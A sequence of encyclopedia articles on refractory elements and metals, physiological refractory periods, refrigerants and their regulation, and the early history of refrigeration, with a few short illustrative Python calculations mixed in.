The condensation temperatures are the temperatures at which 50% of the element will be in the form of a solid (rock) under a pressure of 10 −4 bar . However, slightly different groups and temperature ranges are sometimes used. Refractory materials are also often divided into refractory lithophile elements and refractory siderophile elements . [ 3 ] | https://en.wikipedia.org/wiki/Refractory_(planetary_science)
Refractory metals are a class of metals that are extraordinarily resistant to heat and wear . The expression is mostly used in the context of materials science , metallurgy and engineering . The definition of which elements belong to this group differs. The most common definition includes five elements: two of the fifth period ( niobium and molybdenum ) and three of the sixth period ( tantalum , tungsten , and rhenium ). They all share some properties, including a melting point above 2000 °C and high hardness at room temperature. They are chemically inert and have a relatively high density. Their high melting points make powder metallurgy the method of choice for fabricating components from these metals. Some of their applications include tools to work metals at high temperatures, wire filaments, casting molds, and chemical reaction vessels in corrosive environments. Partly due to the high melting point, refractory metals are stable against creep deformation to very high temperatures.
Most definitions of the term 'refractory metals' list the extraordinarily high melting point as a key requirement for inclusion. By one definition, a melting point above 4,000 °F (2,200 °C) is necessary to qualify, which includes iridium , osmium , niobium , molybdenum , tantalum , tungsten , rhenium , rhodium , ruthenium and hafnium . [ 2 ] The five elements niobium , molybdenum , tantalum , tungsten and rhenium are included in all definitions, [ 3 ] while the widest definition includes all elements with a melting point above 2,123 K (1,850 °C), such as titanium , vanadium , zirconium , and chromium . [ 4 ] Technetium is not included because of its radioactivity, though it would otherwise have qualified under the widest definition. [ 5 ]
Refractory metals have high melting points, with tungsten and rhenium having the highest of all elements; the melting points of the others are exceeded only by those of osmium and iridium , and by the sublimation point of carbon . These high melting points define most of their applications. All the metals are body-centered cubic except rhenium, which is hexagonal close-packed . The physical properties of the refractory elements vary significantly because they are members of different groups of the periodic table . [ 6 ] [ 7 ] The hardness, high melting and boiling points, and high enthalpies of atomization of these metals arise from the partial occupation of the outer d subshell , allowing the d electrons to participate in metallic bonding. This gives stiff, highly stable bonds to neighboring atoms and a body-centered cubic crystal structure that resists deformation. Moving to the right in the periodic table, more d electrons increase this effect, but as the d subshell fills they are pulled by the higher nuclear charge into the atom's inert core , reducing their ability to delocalize to form bonds with neighbors. These opposing effects result in groups 5 through 7 exhibiting the most refractory properties. [ 8 ]
Creep resistance is a key property of the refractory metals. In metals, the onset of creep correlates with the melting point of the material; creep in aluminium alloys starts at 200 °C, while for refractory metals temperatures above 1500 °C are necessary. This resistance to deformation at high temperatures makes the refractory metals suitable for withstanding strong forces at high temperature, for example in jet engines , or in tools used during forging . [ 9 ] [ 10 ]
The refractory metals show a wide variety of chemical properties because they are members of three distinct groups in the periodic table . They are easily oxidized, but this reaction is slowed down in the bulk metal by the formation of stable oxide layers on the surface ( passivation ). The oxide of rhenium, in particular, is more volatile than the metal, so at high temperature the stabilization against the attack of oxygen is lost because the oxide layer evaporates. They are all relatively stable against acids. [ 6 ]
Refractory metals, and alloys made from them, are used in lighting , tools, lubricants , nuclear reaction control rods , as catalysts , and for their chemical or electrical properties. Because of their high melting point , refractory metal components are never fabricated by casting . The process of powder metallurgy is used. Powders of the pure metal are compacted, heated using electric current, and further fabricated by cold working with annealing steps. Refractory metals and their alloys can be worked into wire , ingots , rebars , sheets or foil .
Molybdenum-based alloys are widely used, because they are cheaper than superior tungsten alloys. The most widely used alloy of molybdenum is the Titanium-Zirconium-Molybdenum alloy TZM, composed of 0.5% titanium and 0.08% zirconium (with molybdenum being the rest). The alloy exhibits a higher creep resistance and strength at high temperatures, making service temperatures of above 1060 °C possible for the material. The high resistance of Mo-30W, an alloy of 70% molybdenum and 30% tungsten, to attack by molten zinc makes it an ideal material for casting zinc. It is also used to construct valves for molten zinc. [ 11 ]
Molybdenum is used in mercury wetted reed relays , because molybdenum does not form amalgams and is therefore resistant to corrosion by liquid mercury . [ 12 ] [ 13 ]
Molybdenum is the most commonly used of the refractory metals. Its most important use is as a strengthening alloy of steel . Structural tubing and piping often contains molybdenum, as do many stainless steels . Its strength at high temperatures, resistance to wear and low coefficient of friction are all properties which make it invaluable as an alloying compound. Its excellent anti-friction properties lead to its incorporation in greases and oils where reliability and performance are critical. Automotive constant-velocity joints use grease containing molybdenum. The compound sticks readily to metal and forms a very hard, friction-resistant coating. Most of the world's molybdenum ore can be found in China, the USA , Chile and Canada . [ 14 ] [ 15 ] [ 16 ] [ 17 ]
Tungsten was discovered in 1781 by Swedish chemist Carl Wilhelm Scheele . Tungsten has the highest melting point of all metals, at 3,410 °C (6,170 °F ).
Up to 22% rhenium is alloyed with tungsten to improve its high-temperature strength and corrosion resistance. Thorium is used as an alloying addition when electric arcs have to be established: the ignition is easier and the arc burns more stably than without the addition of thorium. For powder metallurgy applications, binders have to be used for the sintering process. For the production of tungsten heavy alloy, binder mixtures of nickel and iron or nickel and copper are widely used. The tungsten content of the alloy is normally above 90%. The diffusion of the binder elements into the tungsten grains is low even at the sintering temperatures, and therefore the interior of the grains is pure tungsten. [ 18 ]
Tungsten and its alloys are often used in applications where high temperatures are present but high strength is still necessary and the high density is not troublesome. [ 19 ] Tungsten wire filaments provide the vast majority of household incandescent lighting , but are also common in industrial lighting as electrodes in arc lamps. Lamps become more efficient in converting electric energy to light at higher temperatures, and therefore a high melting point is essential for use as a filament in incandescent lighting. [ 20 ] Gas tungsten arc welding (GTAW, also known as tungsten inert gas (TIG) welding) equipment uses a permanent, non-melting electrode . The high melting point and the wear resistance against the electric arc make tungsten a suitable material for the electrode. [ 21 ] [ 22 ]
Tungsten's high density and strength are also key properties for its use in weapon projectiles , for example as an alternative to depleted uranium for tank gun rounds. [ 23 ] Its high melting point makes tungsten a good material for applications like rocket nozzles , for example in the UGM-27 Polaris . [ 24 ] Some of the applications of tungsten are not related to its refractory properties but simply to its density. For example, it is used in balance weights for planes and helicopters or for heads of golf clubs . [ 25 ] [ 26 ] In these applications, similarly dense materials such as the more expensive osmium can also be used.
The most common use for tungsten is as the compound tungsten carbide in drill bits , machining and cutting tools. The largest reserves of tungsten are in China , with deposits in Korea , Bolivia , Australia , and other countries.
It also serves as a lubricant and antioxidant , in nozzles and bushings, as a protective coating, and in many other ways. Tungsten can be found in printing inks, x-ray screens, in the processing of petroleum products, and in the flameproofing of textiles .
Niobium is nearly always found together with tantalum, and was named after Niobe , the daughter of the mythical Greek king Tantalus for whom tantalum was named. Niobium has many uses, some of which it shares with other refractory metals. It is unique in that it can be worked through annealing to achieve a wide range of strength and ductility , and is the least dense of the refractory metals. It can also be found in electrolytic capacitors and in the most practical superconducting alloys. Niobium can be found in aircraft gas turbines , vacuum tubes and nuclear reactors .
An alloy used for liquid rocket thruster nozzles, such as in the main engine of the Apollo Lunar Modules , is C103, which consists of 89% niobium, 10% hafnium and 1% titanium. [ 27 ] Another niobium alloy was used for the nozzle of the Apollo Service Module . As niobium is oxidized at temperatures above 400 °C, a protective coating is necessary for these applications to prevent the alloy from becoming brittle. [ 27 ]
Tantalum is one of the most corrosion -resistant substances available.
Many important uses have been found for tantalum owing to this property, particularly in the medical and surgical fields, and also in harsh acidic environments. It is also used to make superior electrolytic capacitors. Tantalum films provide the second most capacitance per volume of any substance after Aerogel , [ citation needed ] and allow miniaturization of electronic components and circuitry . Many cellular phones and computers contain tantalum capacitors.
Rhenium is the most recently discovered refractory metal. It is found in low concentrations with many other metals, in the ores of other refractory metals, platinum or copper ores. It is useful as an alloy to other refractory metals, where it adds ductility and tensile strength . Rhenium alloys are being used in electronic components, gyroscopes and nuclear reactors . Rhenium finds its most important use as a catalyst. It is used as a catalyst in reactions such as alkylation , dealkylation , hydrogenation and oxidation . However its rarity makes it the most expensive of the refractory metals. [ 28 ]
The strength and high-temperature stability of refractory metals make them suitable for hot metalworking applications and for vacuum furnace technology. Many special applications exploit these properties: for example, tungsten lamp filaments operate at temperatures up to 3073 K, and molybdenum furnace windings withstand 2273 K.
However, poor low-temperature fabricability and extreme oxidability at high temperatures are shortcomings of most refractory metals. Interactions with the environment can significantly influence their high-temperature creep strength. Application of these metals requires a protective atmosphere or coating.
The refractory metal alloys of molybdenum, niobium, tantalum, and tungsten have been applied to space nuclear power systems. These systems were designed to operate at temperatures from 1350 K to approximately 1900 K. The environment must not interact with the material in question; liquid alkali metals are used as the heat transfer fluids, as is ultra-high vacuum .
The high-temperature creep strain of alloys must be limited for them to be used; the creep strain should not exceed 1–2%. An additional complication in studying the creep behavior of the refractory metals is interaction with the environment, which can significantly influence the creep behavior. | https://en.wikipedia.org/wiki/Refractory_metals
Refractoriness is the fundamental property of any object of an autowave nature (especially an excitable medium ) of not responding to stimuli while the object stays in a specific refractory state . In this general sense, the refractory period is the characteristic recovery time, a period that is associated with the motion of the image point on the left branch of the isocline $\dot{u}=0$ [ B: 1 ] (for more details, see also Reaction–diffusion and Parabolic partial differential equation ).
In physiology , [ B: 2 ] a refractory period is a period of time during which an organ or cell is incapable of repeating a particular action, or (more precisely) the amount of time it takes for an excitable membrane to be ready for a second stimulus once it returns to its resting state following an excitation. It most commonly refers to electrically excitable muscle cells or neurons. Absolute refractory period corresponds to depolarization and repolarization, whereas relative refractory period corresponds to hyperpolarization.
After initiation of an action potential, the refractory period is defined in two ways:
The absolute refractory period coincides with nearly the entire duration of the action potential. In neurons , it is caused by the inactivation of the voltage-gated sodium channels that originally opened to depolarize the membrane. These channels remain inactivated until the membrane hyperpolarizes. The channels then close, de-inactivate, and regain their ability to open in response to stimulus.
The relative refractory period immediately follows the absolute. As voltage-gated potassium channels open to terminate the action potential by repolarizing the membrane, the potassium conductance of the membrane increases dramatically. K + ions moving out of the cell bring the membrane potential closer to the equilibrium potential for potassium. This causes brief hyperpolarization of the membrane, that is, the membrane potential becomes transiently more negative than the normal resting potential. Until the potassium conductance returns to the resting value, a greater stimulus will be required to reach the initiation threshold for a second depolarization. The return to the equilibrium resting potential marks the end of the relative refractory period.
The refractory period in cardiac physiology is related to the ion currents that, in cardiac cells as in nerve cells, flow into and out of the cell freely. The flow of ions translates into a change in the voltage of the inside of the cell relative to the extracellular space. As in nerve cells, this characteristic change in voltage is referred to as an action potential. Unlike that in nerve cells, the cardiac action potential duration is closer to 100 ms (with variations depending on cell type, autonomic tone, etc.). After an action potential initiates, the cardiac cell is unable to initiate another action potential for some duration of time (which is slightly shorter than the "true" action potential duration). This period of time is referred to as the refractory period, which is 250 ms in duration and helps to protect the heart.
In the classical sense, the cardiac refractory period is separated into an absolute refractory period and a relative refractory period. During the absolute refractory period, a new action potential cannot be elicited. During the relative refractory period, a new action potential can be elicited under the correct circumstances.
The cardiac refractory period can result in different forms of re-entry , which are a cause of tachycardia . [ 1 ] [ B: 3 ] Vortices of excitation in the myocardium ( autowave vortices ) are a form of re-entry . Such vortices can be a mechanism of life-threatening cardiac arrhythmias . In particular, the autowave reverberator , more commonly referred to as spiral waves or rotors, can be found within the atria and may be a cause of atrial fibrillation .
The refractory period in a neuron occurs after an action potential and generally lasts one millisecond. An action potential consists of three phases.
Phase one is depolarization. During depolarization, voltage-gated sodium ion channels open, increasing the neuron's membrane conductance for sodium ions and depolarizing the cell's membrane potential (from typically -70 mV toward a positive potential). In other words, the membrane is made less negative. After the potential reaches the activation threshold (-55 mV), the depolarization is actively driven by the neuron and overshoots the equilibrium potential of an activated membrane (+30 mV).
Phase two is repolarization. During repolarization, voltage-gated sodium ion channels inactivate (different from the closed state) due to the now-depolarized membrane, and voltage-gated potassium channels activate (open). Both the inactivation of the sodium ion channels and the opening of the potassium ion channels act to repolarize the cell's membrane potential back to its resting membrane potential.
When the cell's membrane voltage overshoots its resting membrane potential (near -60 mV), the cell enters a phase of hyperpolarization. This is due to a larger-than-resting potassium conductance across the cell membrane. This potassium conductance eventually drops and the cell returns to its resting membrane potential.
Recent research has shown that neuronal refractory periods can exceed 20 milliseconds. Furthermore, the relation between hyperpolarization and the neuronal refractory was questioned, as neuronal refractory periods were observed for neurons that do not exhibit hyperpolarization. [ 2 ] [ 3 ] The neuronal refractory period was shown to be dependent on the origin of the input signal to the neuron, as well as the preceding spiking activity of the neuron. [ 3 ]
The refractory periods are due to the inactivation property of voltage-gated sodium channels and the lag of potassium channels in closing. Voltage-gated sodium channels have two gating mechanisms: the activation mechanism, which opens the channel with depolarization, and the inactivation mechanism, which closes the channel with repolarization. While the channel is in the inactive state, it will not open in response to depolarization. The period when the majority of sodium channels remain in the inactive state is the absolute refractory period. After this period, there are enough voltage-activated sodium channels in the closed (active) state to respond to depolarization. However, the voltage-gated potassium channels that opened in response to repolarization do not close as quickly as the voltage-gated sodium channels return to their closed (active) state. During this time, the extra potassium conductance means that the membrane is at a higher threshold and will require a greater stimulus to cause action potentials to fire. In other words, because the membrane potential inside the axon becomes increasingly negative relative to the outside of the membrane, a stronger stimulus will be required to reach the threshold voltage, and thus, initiate another action potential. This period is the relative refractory period.
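The qualitative behaviour described above, where an identical second stimulus fails to trigger a spike until the cell has recovered, can be reproduced by simple excitable-medium models such as the FitzHugh–Nagumo equations mentioned in the autowave description earlier. The sketch below is a minimal forward-Euler simulation with illustrative parameters (not a fit to any real neuron): the first and last stimuli evoke full spikes, while an identical stimulus delivered during the refractory window does not.

```python
def simulate(pulse_times, a=0.7, b=0.8, eps=0.08, dt=0.01, t_end=120.0,
             amp=0.8, width=1.0):
    """Forward-Euler integration of the FitzHugh-Nagumo model:
    dv/dt = v - v**3/3 - w + I(t),   dw/dt = eps*(v + a - b*w)."""
    v, w = -1.1994, -0.6243           # resting state for these parameters
    trace, t = [], 0.0
    while t < t_end:
        I = amp if any(t0 <= t < t0 + width for t0 in pulse_times) else 0.0
        dv = v - v**3 / 3.0 - w + I
        dw = eps * (v + a - b * w)
        v, w = v + dt * dv, w + dt * dw
        trace.append((t, v))
        t += dt
    return trace

def peak_after(trace, t0, window=15.0):
    """Largest value of the voltage-like variable v in the window after a stimulus."""
    return max(v for t, v in trace if t0 <= t < t0 + window)

trace = simulate(pulse_times=[5.0, 25.0, 100.0])
print(peak_after(trace, 5.0))     # first stimulus: full spike, v peaks near +2
print(peak_after(trace, 25.0))    # identical stimulus in the refractory window: no spike, v stays near -1
print(peak_after(trace, 100.0))   # after recovery: a full spike again
```

In this toy model the refractoriness comes entirely from the slow recovery variable w, which plays the role of the lingering potassium conductance and inactivated sodium channels described above.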
The muscle action potential lasts roughly 2–4 ms and the absolute refractory period is roughly 1–3 ms, shorter than other cells. | https://en.wikipedia.org/wiki/Refractory_period_(physiology) |
A refrigerant is a working fluid used in the cooling, heating, or reverse cooling/heating cycles of air conditioning systems and heat pumps , where they undergo a repeated phase transition from a liquid to a gas and back again. Refrigerants are heavily regulated because of their toxicity and flammability , [ 1 ] as well as the contribution of CFC and HCFC refrigerants to ozone depletion [ 2 ] and the contribution of HFC refrigerants to climate change . [ 3 ]
Refrigerants are used in a direct expansion (DX) circulating system to transfer energy from one environment to another, typically from inside a building to outside or vice versa. These can be air conditioner cooling only systems, cooling & heating reverse DX systems, or heat pump and heating only DX cycles. Refrigerants can carry 10 times more energy per kg than water, and 50 times more than air. [ 4 ]
Refrigerants are controlled substances that are classified by several international safety regulations and, depending on their classification, may only be handled by qualified engineers due to extreme pressure , temperature , flammability , and toxicity .
The first air conditioners and refrigerators employed toxic or flammable gases, such as ammonia , sulfur dioxide , methyl chloride , or propane , that could result in fatal accidents when they leaked. [ 5 ]
In 1928 Thomas Midgley Jr. created the first non-flammable, non-toxic chlorofluorocarbon gas, Freon (R-12). The name is a trademark name owned by DuPont (now Chemours ) for any chlorofluorocarbon (CFC), hydrochlorofluorocarbon (HCFC), or hydrofluorocarbon (HFC) refrigerant. Following the discovery of better synthesis methods, CFCs such as R-11 , [ 6 ] R-12 , [ 7 ] R-123 [ 6 ] and R-502 [ 8 ] dominated the market.
In the mid-1970s, scientists discovered that CFCs were causing major damage to the ozone layer that protects the earth from ultraviolet radiation, contributing to ozone holes over polar regions. [ 9 ] [ 10 ] This led to the signing of the Montreal Protocol in 1987, which aimed to phase out CFCs and HCFCs [ 11 ] but did not address the contributions that HFCs made to climate change. The adoption of HCFCs such as R-22 [ 12 ] [ 13 ] [ 14 ] and R-123 [ 6 ] was accelerated, and these were used in most U.S. homes in air conditioners and in chillers [ 15 ] from the 1980s, as they have a dramatically lower Ozone Depletion Potential (ODP) than CFCs; but their ODP was still not zero, which led to their eventual phase-out.
Hydrofluorocarbons (HFCs) such as R-134a , [ 16 ] [ 17 ] R-407A , [ 18 ] R-407C , [ 19 ] R-404A , [ 8 ] R-410A [ 20 ] (a 50/50 blend of R-125 / R-32 ) and R-507 [ 21 ] [ 22 ] were promoted as replacements for CFCs and HCFCs in the 1990s and 2000s. HFCs were not ozone-depleting but did have global warming potentials (GWPs) thousands of times greater than CO 2 with atmospheric lifetimes that can extend for decades. This in turn, starting from the 2010s, led to the adoption in new equipment of Hydrocarbon and HFO ( hydrofluoroolefin ) refrigerants R-32, [ 23 ] R-290, [ 24 ] R-600a, [ 24 ] R-454B , [ 25 ] R-1234yf , [ 26 ] [ 27 ] R-514A, [ 28 ] R-744 (CO 2 ), [ 29 ] R-1234ze(E) [ 30 ] and R-1233zd(E) , [ 31 ] which have both an ODP of zero and a lower GWP. Hydrocarbons and CO 2 are sometimes called natural refrigerants because they can be found in nature.
The environmental organization Greenpeace provided funding to a former East German refrigerator company to research alternative ozone- and climate-safe refrigerants in 1992. The company developed a hydrocarbon mixture of propane and isobutane , or pure isobutane, [ 32 ] called "Greenfreeze", but as a condition of the contract with Greenpeace could not patent the technology, which led to widespread adoption by other firms. [ 33 ] [ 34 ] [ 35 ] Corporate executives, however, resisted the change through policy and political influence, [ 36 ] [ 37 ] citing the flammability and explosive properties of the refrigerants, [ 38 ] and DuPont together with other companies blocked them in the U.S. with the U.S. EPA. [ 39 ] [ 40 ]
Beginning on 14 November 1994, the U.S. Environmental Protection Agency restricted the sale, possession and use of refrigerants to only licensed technicians, per rules under sections 608 and 609 of the Clean Air Act. [ 41 ] In 1995, Germany made CFC refrigerators illegal. [ 42 ]
In 1996 Eurammon , a European non-profit initiative for natural refrigerants , was established and comprises European companies, institutions, and industry experts. [ 43 ] [ 44 ] [ 45 ]
In 1997, FCs and HFCs were included in the Kyoto Protocol to the Framework Convention on Climate Change.
In 2000 in the UK, the Ozone Regulations [ 46 ] came into force which banned the use of ozone-depleting HCFC refrigerants such as R22 in new systems. The Regulation banned the use of R22 as a "top-up" fluid for maintenance from 2010 for virgin fluid and from 2015 for recycled fluid. [ citation needed ]
With growing interest in natural refrigerants as alternatives to synthetic refrigerants such as CFCs, HCFCs and HFCs, in 2004, Greenpeace worked with multinational corporations like Coca-Cola and Unilever , and later Pepsico and others, to create a corporate coalition called Refrigerants Naturally!. [ 42 ] [ 47 ] Four years later, Ben & Jerry's of Unilever and General Electric began to take steps to support production and use in the U.S. [ 48 ] It is estimated that almost 75 percent of the refrigeration and air conditioning sector has the potential to be converted to natural refrigerants. [ 49 ]
In 2006, the EU adopted a Regulation on fluorinated greenhouse gases (FCs and HFCs) to encourage the transition to natural refrigerants (such as hydrocarbons). It was reported in 2010 that some refrigerants are being used as recreational drugs , leading to an extremely dangerous phenomenon known as inhalant abuse . [ 50 ]
From 2011 the European Union started to phase out refrigerants with a global warming potential (GWP) of more than 150 in automotive air conditioning (GWP = 100-year warming potential of one kilogram of a gas relative to one kilogram of CO 2 ) such as the refrigerant HFC-134a (known as R-134a in North America) which has a GWP of 1526. [ 51 ] In the same year the EPA decided in favour of the ozone- and climate-safe refrigerant for U.S. manufacture. [ 33 ] [ 52 ] [ 53 ]
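As a small worked example of the GWP figure quoted above (using the R-134a value of 1526 from this paragraph; the leak size is hypothetical and chosen only for illustration):

```python
# CO2-equivalent of a refrigerant leak: leaked mass (kg) times the 100-year GWP.
GWP_100 = {
    "R-134a": 1526,        # value quoted in the text above
    "R-744 (CO2)": 1,      # by definition
}

def co2_equivalent_kg(refrigerant, leaked_kg):
    return leaked_kg * GWP_100[refrigerant]

# Hypothetical example: a car air-conditioning system losing 0.5 kg of R-134a.
print(co2_equivalent_kg("R-134a", 0.5))   # 763 kg CO2-equivalent
```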
A 2018 study by the nonprofit organization " Drawdown " put proper refrigerant management and disposal at the very top of the list of climate impact solutions, with an impact equivalent to eliminating over 17 years of US carbon dioxide emissions. [ 54 ]
In 2019 it was estimated that CFCs, HCFCs, and HFCs were responsible for about 10% of direct radiative forcing from all long-lived anthropogenic greenhouse gases. [ 55 ] In the same year the UNEP published new voluntary guidelines; [ 56 ] however, many countries have not yet ratified the Kigali Amendment .
From early 2020 HFCs (including R-404A, R-134a, and R-410A) are being superseded: residential air-conditioning systems and heat pumps are increasingly using R-32 , which still has a GWP of more than 600. Progressive devices use refrigerants with almost no climate impact, namely R-290 (propane), R-600a (isobutane), or R-1234yf (less flammable, used in cars). In commercial refrigeration, CO 2 (R-744) can also be used.
A refrigerant needs to have: a boiling point that is somewhat below the target temperature (although boiling point can be adjusted by adjusting the pressure appropriately), a high heat of vaporization , a moderate density in liquid form, a relatively high density in gaseous form (which can also be adjusted by setting pressure appropriately), and a high critical temperature . Working pressures should ideally be containable by copper tubing , a commonly available material. Extremely high pressures should be avoided. [ citation needed ]
The ideal refrigerant would be: non-corrosive , non-toxic , non-flammable , with no ozone depletion and global warming potential. It should preferably be natural with well-studied and low environmental impact. Newer refrigerants address the issue of the damage that CFCs caused to the ozone layer and the contribution that HCFCs make to climate change, but some do raise issues relating to toxicity and/or flammability. [ 57 ]
With increasing regulations, refrigerants with a very low global warming potential are expected to play a dominant role in the 21st century, [ 58 ] in particular R-290 and R-1234yf. Starting from almost no market share in 2018, [ 59 ] low-GWP devices are gaining market share in 2022.
Coolant and refrigerants are found throughout the industrialized world, in homes, offices, and factories, in devices such as refrigerators, air conditioners, central air conditioning systems (HVAC), freezers, and dehumidifiers. When these units are serviced, there is a risk that refrigerant gas will be vented into the atmosphere either accidentally or intentionally, hence the creation of technician training and certification programs in order to ensure that the material is conserved and managed safely. Mistreatment of these gases has been shown to deplete the ozone layer and is suspected to contribute to global warming . [ 82 ]
With the exception of isobutane and propane (R600a, R441A, and R290), ammonia and CO 2 , under Section 608 of the United States' Clean Air Act it is illegal to knowingly release any refrigerants into the atmosphere. [ 83 ] [ 84 ]
Refrigerant reclamation is the act of processing used refrigerant gas that has previously been used in some type of refrigeration loop such that it meets specifications for new refrigerant gas. In the United States , the Clean Air Act of 1990 requires that used refrigerant be processed by a certified reclaimer, which must be licensed by the United States Environmental Protection Agency (EPA), and the material must be recovered and delivered to the reclaimer by EPA-certified technicians. [ 85 ]
Refrigerants may be divided into three classes according to their manner of absorption or extraction of heat from the substances to be refrigerated: [ citation needed ]
The R- numbering system was developed by DuPont (which owned the Freon trademark), and systematically identifies the molecular structure of refrigerants made with a single halogenated hydrocarbon. ASHRAE has since set guidelines for the numbering system as follows: [ 86 ]
R-X 1 X 2 X 3 X 4
For example, R-134a has 2 carbon atoms, 2 hydrogen atoms, and 4 fluorine atoms, an empirical formula of tetrafluoroethane. The "a" suffix indicates that the isomer is unbalanced by one atom, giving 1,1,1,2-Tetrafluoroethane . R-134 (without the "a" suffix) would have a molecular structure of 1,1,2,2-Tetrafluoroethane.
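Under this ASHRAE convention, for R-XYZ the first digit is the number of carbon atoms minus one, the second is the number of hydrogen atoms plus one, the third is the number of fluorine atoms, and chlorine fills the remaining bonds of the saturated carbon skeleton (consistent with the R-134a example above). The sketch below decodes a designation on that basis; it handles only simple single-component halogenated hydrocarbons and ignores isomer suffixes.

```python
def decode_r_number(code):
    """Decode a single-component halogenated-hydrocarbon designation (ASHRAE 34
    convention): for R-XYZ, carbon = X + 1, hydrogen = Y - 1, fluorine = Z, and
    chlorine fills the remaining bonds of the saturated carbon skeleton.
    Isomer suffixes such as the "a" in R-134a are ignored."""
    digits = code.upper().lstrip("R-").rstrip("ABCD")
    digits = digits.zfill(3)                  # e.g. "12" is treated as "012"
    x, y, z = (int(d) for d in digits)
    carbon, hydrogen, fluorine = x + 1, y - 1, z
    chlorine = (2 * carbon + 2) - hydrogen - fluorine
    return {"C": carbon, "H": hydrogen, "F": fluorine, "Cl": chlorine}

print(decode_r_number("R-134a"))   # {'C': 2, 'H': 2, 'F': 4, 'Cl': 0} -> tetrafluoroethane
print(decode_r_number("R-12"))     # {'C': 1, 'H': 0, 'F': 2, 'Cl': 2} -> dichlorodifluoromethane
```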
The same numbers are used with an R- prefix for generic refrigerants, with a "Propellant" prefix (e.g., "Propellant 12") for the same chemical used as a propellant for an aerosol spray , and with trade names for the compounds, such as " Freon 12". Recently, a practice of using abbreviations HFC- for hydrofluorocarbons , CFC- for chlorofluorocarbons , and HCFC- for hydrochlorofluorocarbons has arisen, because of the regulatory differences among these groups. [ citation needed ]
Refrigerants are classified under regulations such as ISO 817/5149, ASHRAE 34/15, and BS EN 378. The pressures of these gases can range from 700–1,000 kPa (100–150 psi). They can also be at temperatures as low as −50 °C [−58 °F] and as high as over 100 °C [212 °F]. Refrigerants have varying classifications of flammability : A1 class are non-flammable, A2/A2L class are flammable, and A3 class are extremely flammable and/or explosive . Toxicity also varies; B1 class refrigerants have low toxicity, while B2 refrigerants are moderately toxic and B3 refrigerants are highly toxic. [ citation needed ] These regulations relate to situations where these refrigerants are released into the atmosphere in the event of an accidental leak, not while circulated. [ 87 ] Due to these regulations, most refrigerants may only be handled by qualified/certified engineers for the relevant classes; in the UK, C&G 2079 is required for A1-class refrigerants, while C&G 6187-2 is required for A2, A2L, and A3-class refrigerants. [ citation needed ] Due to their non-flammability, non-explosivity, and non-toxicity, A1 class refrigerants have been used in open systems (where they are consumed when used rather than circulated) like fire extinguishers , inhalers , computer rooms, and insulation since 1928. [ citation needed ]
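These class codes combine a toxicity letter with a flammability number (the ASHRAE scheme elaborated below). A minimal decoder sketch; the wording of the class descriptions and the example assignments are commonly cited but should be treated as illustrative rather than authoritative:

```python
# Decoding an ASHRAE 34 style safety class: a toxicity letter plus a flammability number.
TOXICITY = {"A": "lower toxicity", "B": "higher toxicity"}
FLAMMABILITY = {"1": "no flame propagation", "2L": "lower flammability",
                "2": "flammable", "3": "higher flammability"}

def describe_safety_class(cls):
    return f"{cls}: {TOXICITY[cls[0].upper()]}, {FLAMMABILITY[cls[1:].upper()]}"

# Commonly cited (illustrative) assignments:
for refrigerant, cls in [("R-134a", "A1"), ("R-32", "A2L"),
                         ("R-290 propane", "A3"), ("R-717 ammonia", "B2L")]:
    print(refrigerant, "->", describe_safety_class(cls))
```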
ASHRAE Standard 34, Designation and Safety Classification of Refrigerants , assigns safety classifications to refrigerants based upon toxicity and flammability . ASHRAE assigns a capital letter to indicate toxicity and a number to indicate flammability. The letter "A" is the least toxic and the number 1 is the least flammable. [ 88 ] | https://en.wikipedia.org/wiki/Refrigerant |
Refrigeration is any of various types of cooling of a space, substance, or system to lower and/or maintain its temperature below the ambient one (while the removed heat is ejected to a place of higher temperature). [ 1 ] [ 2 ] Refrigeration is an artificial, or human-made, cooling method. [ 1 ] [ 2 ]
Refrigeration refers to the process by which energy, in the form of heat, is removed from a low-temperature medium and transferred to a high-temperature medium. [ 3 ] [ 4 ] This work of energy transfer is traditionally driven by mechanical means (whether ice or electromechanical machines), but it can also be driven by heat, magnetism , electricity , laser , or other means. Refrigeration has many applications, including household refrigerators , industrial freezers , cryogenics , and air conditioning . [ 5 ] [ 6 ] [ 7 ] Heat pumps may use the heat output of the refrigeration process, and also may be designed to be reversible, but are otherwise similar to air conditioning units. [ 5 ]
Refrigeration has had a large impact on industry, lifestyle, agriculture, and settlement patterns. [ 8 ] The idea of preserving food dates back to human prehistory , but for thousands of years humans were limited regarding the means of doing so. They used curing via salting and drying , and they made use of natural coolness in caves , root cellars , and winter weather, but other means of cooling were unavailable. In the 19th century, they began to make use of the ice trade to develop cold chains . [ 9 ] In the late 19th through mid-20th centuries, mechanical refrigeration was developed, improved, and greatly expanded in its reach. [ 3 ] Refrigeration has thus rapidly evolved in the past century, from ice harvesting to temperature-controlled rail cars , refrigerator trucks , and ubiquitous refrigerators and freezers in both stores and homes in many countries. The introduction of refrigerated rail cars contributed to the settlement of areas that were not on earlier main transport channels such as rivers, harbors, or valley trails.
These new settlement patterns sparked the building of large cities which are able to thrive in areas that were otherwise thought to be inhospitable, such as Houston , Texas, and Las Vegas , Nevada. In most developed countries, cities are heavily dependent upon refrigeration in supermarkets in order to obtain their food for daily consumption. [ 10 ] The increase in food sources has led to a larger concentration of agricultural sales coming from a smaller percentage of farms. [ 11 ] Farms today have a much larger output per person in comparison to the late 1800s. [ 12 ] [ 11 ] This has resulted in new food sources available to entire populations, which has had a large impact on the nutrition of society.
The seasonal harvesting of snow and ice is an ancient practice estimated to have begun earlier than 1000 BC. [ 13 ] A Chinese collection of lyrics from this time period known as the Shijing describes religious ceremonies for filling and emptying ice cellars. However, little is known about the construction of these ice cellars or the purpose of the ice. The next ancient society to record the harvesting of ice may have been the Jews in the book of Proverbs, which reads, "As the cold of snow in the time of harvest, so is a faithful messenger to them who sent him." Historians have interpreted this to mean that the Jews used ice to cool beverages rather than to preserve food. Other ancient cultures such as the Greeks and the Romans dug large snow pits insulated with grass, chaff, or branches of trees as cold storage. Like the Jews, the Greeks and Romans did not use ice and snow to preserve food, but primarily as a means to cool beverages. Egyptians cooled water by evaporation in shallow earthen jars on the roofs of their houses at night. The ancient people of India used this same concept to produce ice. The Persians stored ice in a pit called a Yakhchal and may have been the first group of people to use cold storage to preserve food. In the Australian outback, before a reliable electricity supply was available, many farmers used a Coolgardie safe , consisting of a box frame with hessian (burlap) sides soaked in water. The water would evaporate and thereby cool the interior air, allowing many perishables such as fruit, butter, and cured meats to be kept. [ 14 ] [ 15 ]
Before 1830, few Americans used ice to refrigerate foods due to a lack of ice-storehouses and iceboxes. As these two things became more widely available, individuals used axes and saws to harvest ice for their storehouses. This method proved to be difficult, dangerous, and certainly did not resemble anything that could be duplicated on a commercial scale. [ 16 ]
